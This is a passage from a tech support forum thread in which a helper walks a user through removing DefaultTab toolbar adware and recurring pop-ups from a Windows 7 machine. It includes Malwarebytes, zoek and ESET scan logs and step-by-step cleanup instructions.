<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_flat_0_aaaaaa_40x100.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_flat_75_ffffff_40x100.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_glass_55_fbf9ee_1x400.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_glass_65_ffffff_1x400.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_glass_75_dadada_1x400.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_glass_75_e6e6e6_1x400.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_glass_95_fef1ec_1x400.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-bg_highlight-soft_75_cccccc_1x100.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-icons_222222_256x240.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-icons_2e83ff_256x240.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-icons_454545_256x240.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-icons_888888_256x240.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\css\jquery_ui\images\ui-icons_cd0a0a_256x240.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\help.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\engines_icons\Bing.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\engines_icons\Google.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\engines_icons\Search here.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\engines_icons\Yahoo.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_border_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\bullet_arrow_down.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\bullet_arrow_down_old.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\icon.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search-inner-wrapper.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search-left.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_arrow_top_button.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_arrow_top_button_hovered.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_left_before_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_left_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_right_before_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_bottom_right_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_left_border_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_left_bottom_border_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_middle_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_right_border_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_right_bottom_border_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_top_bg.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_top_left_before_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_top_left_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_top_right_before_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\images\injection\search_top_right_corner.png</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\bg.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\ConfigManager.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\content.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\InjectionManager.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\jquery-1.7.1.min.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\jquery-ui-1.8.16.custom.min.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\jquery.guid.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\newTab.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\ScriptChecker.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\ScriptInjector.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

-<file>

<path>C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.0_0\js\SearchBox.js</path>

<vendor>PUP.Optional.DefaultTab.A</vendor>

<action>success</action>

<hash>e42b44107dfe2d0962203c437a88e020</hash>

</file>

</items>

</mbam-log>


----------



## emeraldnzl (Nov 3, 2007)

> In any case I have located the log ('Settings' then 'History Settings') in xml and have copied it here:


Thankyou. Actually the text file one is better. The xml one is hard to read.

The question is, did you "*Apply Actions*" to clean what it found?



> Attached an image of the remaining pop-up.


Is that still happening after running AdwCleaner and MBAM?


----------



## raphael100 (May 24, 2014)

The 2 blank pop-ups are back. I have attached an image. There is slightly different http:// text in the top left corner of each which might mean something?

Thanks for your help.


----------



## emeraldnzl (Nov 3, 2007)

Please answer my question:

When you ran MBAM did you apply the actions to fix what it found?


----------



## raphael100 (May 24, 2014)

Yes I did.


----------



## raphael100 (May 24, 2014)

I am using Chrome now - in a different physical location - No pop-up.


----------



## emeraldnzl (Nov 3, 2007)

> Yes I did.


Okay, it looks like we have missed something.



> I am using Chrome now - in a different physical location - No pop-up.


Something in preferences in the old position maybe.

Let's try this:

Please download zoek.exe and save it to your desktop (Firefox users right click and Save Link As...).


Close any open browsers.
Temporarily disable your AntiVirus program. (If necessary)
 Double click zoek.zip
 Double click on *zoek.exe* to run. 
 Please wait while the tool starts. *It will appear to be doing nothing and may take a few seconds to come up*.
 Copy the text below and paste it into the large window in the zoek tool:


```
FFDefaults;
CHRDefaults;
emptyclsid;
EmptyAllTemp;
AutoClean;
```

 Click on *Run script* button

 Please wait patiently *(it may take a few minutes)* until a log report will open (this may be after reboot, if required)

 Copy (Ctrl +C) and paste (Ctrl +V) the contents of the opened entire report back here.
Note: It will also create a log in the C:\ directory named "zoek-results.log"


----------



## raphael100 (May 24, 2014)

Hi. Thanks: I am back in the original physical location (home) and the pop-ups (for some reason) are once again no longer appearing.

Zoek.exe v5.0.0.0 Updated 22-05-2014
Tool run by Hewlett Packard on Mon 06/02/2014 at 22:02:47.20.
Microsoft Windows 7 Home Premium 6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Hewlett Packard\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

6/2/2014 10:03:32 PM Zoek.exe System Restore Point Created Succesfully.

==== Deleting CLSID Registry Keys ======================

==== Deleting CLSID Registry Values ======================

==== Deleting Services ======================

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\YahooAUService deleted successfully
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\YahooAUService deleted successfully

==== Deleting Files \ Folders ======================

C:\PROGRA~2\MyFree Codec deleted
C:\Users\Hewlett Packard\AppData\Roaming\DVRLoginInfo3.ini deleted
C:\Users\Hewlett Packard\AppData\Roaming\Yahoo! deleted
C:\PROGRA~3\Yahoo! deleted
C:\PROGRA~3\Yahoo! Companion deleted
C:\PROGRA~3\YTD Video Downloader deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyFree Codec deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader deleted
C:\Users\Hewlett Packard\AppData\LocalLow\Yahoo! deleted
C:\Users\Hewlett Packard\AppData\LocalLow\Yahoo! Companion deleted
C:\Windows\sysWoW64\config\systemprofile\AppData\LocalLow\AVG Secure Search deleted
C:\Windows\SysWow64\AI_RecycleBin deleted


----------



## emeraldnzl (Nov 3, 2007)

> I am back in the original physical location (home) and the pop-ups (for some reason) are once again no longer appearing.


Good news. 

*Now*

Please run a free online scan with the *ESET Online Scanner*

*Vista / Win7 users: *Right-click on the either the IE or FF icon in the Start Menu or Quick Launch Bar on the Taskbar and select *Run as Administrator*.

*Note: This scan works with Internet Explorer or Mozilla FireFox.*

If using* Mozilla Firefox* you will need to download *esetsmartinstaller_enu.exe* when prompted then double click on it to install.


Click the green ESET Online Scanner box
Tick the box next to *YES, I accept the Terms of Use*
then click on: *Start*
You may see a panel towards the top of the screen telling you the website wants to install an addon... click and allow it to install. If your firewall asks whether you want to allow installation, say yes.
 Make sure that the option *Scan archives *is checked.
 If you are given an option to quarantine files ensure the scan is set to do so.
 Now click on *Advanced Settings* and select the following:
*Scan for potentially unwanted applications*
* Scan for potentially unsafe applications*
* Enable Anti-Stealth Technology*

 Click on *Start*
 The virus signature database will begin to download. *Be patient* this make take some time depending on the speed of your Internet Connection.
 When completed the *Online Scan* will begin automatically. The scan may take several hours.
 *Do not touch either the Mouse or keyboard* during the scan otherwise it may stall.
 When completed select *Uninstall application on close*, *make sure you copy the logfile first!*
 Then click on: *Finish*
 Use *notepad* to open the logfile located at *C:\Program Files\ESET\EsetOnlineScanner\log.txt.*
 *Copy *and *paste* that log *as a reply* to this topic.


----------



## raphael100 (May 24, 2014)

After not showing for a while - the pop-ups reappeared last night. The previous clean seemed to remove Yahoo Messenger. When I re-installed YM the pop-ups came back. Not sure if that was coincidental. I uninstalled YM last night, but the pop-ups remained. This morning I ran ESET and attach herewith the log. At the moment the 2 pop-ups are *not* active.

[email protected] as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7587
# api_version=3.0.2
# EOSSerial=3c71900146777146adb58c90585c624c
# engine=18519
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-06-03 07:16:22
# local_time=2014-06-03 03:16:22 (+0800, Malay Peninsula Standard Time)
# country="Republic of the Philippines"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Norton Internet Security'
# compatibility_mode=3597 16777213 100 100 1152269 164372767 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 27419602 153409632 0 0
# scanned=148116
# found=19
# cleaned=17
# scan_time=10132
sh=FAFD98E732BEF3CB7806C776CC25171C0ED8F261 ft=1 fh=851423878734aeac vn="a variant of Win32/Toolbar.DefaultTab.C potentially unwanted application" ac=I fn="C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\1.1.30_0\plugins\npDefaultTabSearch.dll"
sh=F4594843D04219AEB24D49FECC4EC53093BD75AB ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask.F potentially unsafe application" ac=I fn="C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-SGT-V7[1].7z"
sh=537C98DEDD03317D878AA8FF30F09B6905118A69 ft=1 fh=8400617a427141ff vn="Win32/Toolbar.DefaultTab.C potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\DefaultTab\DefaultTabHost.exe.vir"
sh=29E0BD62651B42F04C0DBCED88DA4B3D79A2AB1E ft=1 fh=d02a46483b9bd8c8 vn="a variant of Win32/Toolbar.DefaultTab.B potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\DefaultTab\DefaultTabSearch.exe.vir"
sh=3AA1BFCE076667081BE52ECB957EF67AF74FE47D ft=1 fh=7ce8651a2d78a449 vn="probably a variant of Win32/Toolbar.MyWebSearch.P potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\9tskin.dll.vir"
sh=0FE561E217BD77B377AEA0021A0CDE54D6DE0784 ft=1 fh=2f76f2988120a527 vn="a variant of Win64/Toolbar.MyWebSearch.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\AppIntegrator64.exe.vir"
sh=4BBFDE5160D10A1940036DF5536E3E4197B751C1 ft=1 fh=ee159bd020f3d874 vn="a variant of Win64/Toolbar.MyWebSearch.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\AppIntegratorStub64.dll.vir"
sh=5587CA8049C856F27992FC7D0D9BF95A77143822 ft=1 fh=0700c107a11f224f vn="a variant of Win64/Toolbar.MyWebSearch.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\ASSISTMONITOR64.DLL.vir"
sh=ECD2C8F2E99E6153FED31E2ED56F49F20B67480D ft=1 fh=e22b877d02560dfa vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\CREXT.DLL.vir"
sh=02F8162D86E48C556594E51485663C701D0B9262 ft=1 fh=cf59b9873056a6a3 vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\CrExtP9t.exe.vir"
sh=12ACDFFD9F70B9A4209B0B11D43AECA6DCA6BB86 ft=1 fh=2572809a38bd1170 vn="a variant of Win64/Toolbar.MyWebSearch.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\Hpg64.dll.vir"
sh=D4B287A0266DC5F6F77F3E1A6B6BCCEBC02C3134 ft=1 fh=0a321bb339b36ed3 vn="a variant of Win32/Toolbar.DefaultTab.B potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Users\Hewlett Packard\AppData\Roaming\DefaultTab\defaulttab\DefaultTabBHO.dll.vir"
sh=B6D2E20C72D0626903D1E67B3E6BE17881458AC8 ft=1 fh=48cb686bd0b760bf vn="a variant of Win32/Toolbar.DefaultTab.B potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Users\Hewlett Packard\AppData\Roaming\DefaultTab\defaulttab\DefaultTabStart.exe.vir"
sh=9C4BBB13B347FCC00E98F1A45C0BC7CE0C21E7E7 ft=1 fh=10a265e5733f77e3 vn="a variant of Win32/Toolbar.DefaultTab.B potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Users\Hewlett Packard\AppData\Roaming\DefaultTab\defaulttab\DefaultTabWrap.dll.vir"
sh=EA111903F48C1CB7FE5056509351A88EFE85114F ft=1 fh=0f73ddfd31d1def0 vn="Win32/Toolbar.DefaultTab.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\AdwCleaner\Quarantine\C\Users\Hewlett Packard\AppData\Roaming\DefaultTab\defaulttab\dtupdate.exe.vir"
sh=C70872D7B4F48D529A179C0FA54AB65FB1B982F4 ft=1 fh=f2e2b15faf5e28f3 vn="a variant of Win32/Bundled.Toolbar.Ask.F potentially unsafe application (deleted - quarantined)" ac=C fn="C:\Windows\Installer\MSIE698.tmp"
sh=FAFD98E732BEF3CB7806C776CC25171C0ED8F261 ft=1 fh=851423878734aeac vn="a variant of Win32/Toolbar.DefaultTab.C potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Windows\System32\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\1.1.30_0\plugins\npDefaultTabSearch.dll"
sh=F4594843D04219AEB24D49FECC4EC53093BD75AB ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask.F potentially unsafe application (deleted - quarantined)" ac=C fn="C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-SGT-V7[1].7z"
sh=A108A4C77538493D4947678F0BBDCEE35BAF8764 ft=1 fh=f69c12bd02f703f1 vn="Win32/MyPCBackup.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\zoek_backup\C_PROGRA~3_YTD Video Downloader\ytd_installer.exe"


----------



## emeraldnzl (Nov 3, 2007)

> When I re-installed YM the pop-ups came back. Not sure if that was coincidental.


You may well have bought back the problem.

Depends a bit on where Yahoo items come from.

Yahoo on it's own is fine but it can also come bundled with other stuff see here and here.

*For now*

Run AdwCleaner again and post back the log it generates.

*Also *

Open Malwarebytes, update it and run it again. Export the Text file and copy and paste that back here as well.

Hopefully those actions will get the problem without us having to do anything else.


----------



## raphael100 (May 24, 2014)

Good morning! For several hours yesterday evening there were no popups after the ESET scan. But this morning they are back. Sometime one, sometimes both. The first pop-up seemed to coincide with the first opening of IE (but they do not pop up immediately ... so it is not obvious as to what triggers them) For instance, they have both appeared now but one came a while after the other without IE open (I am using Chrome). I will rerun the adware and malware stuff again you mentioned above. Thanks!


----------



## raphael100 (May 24, 2014)

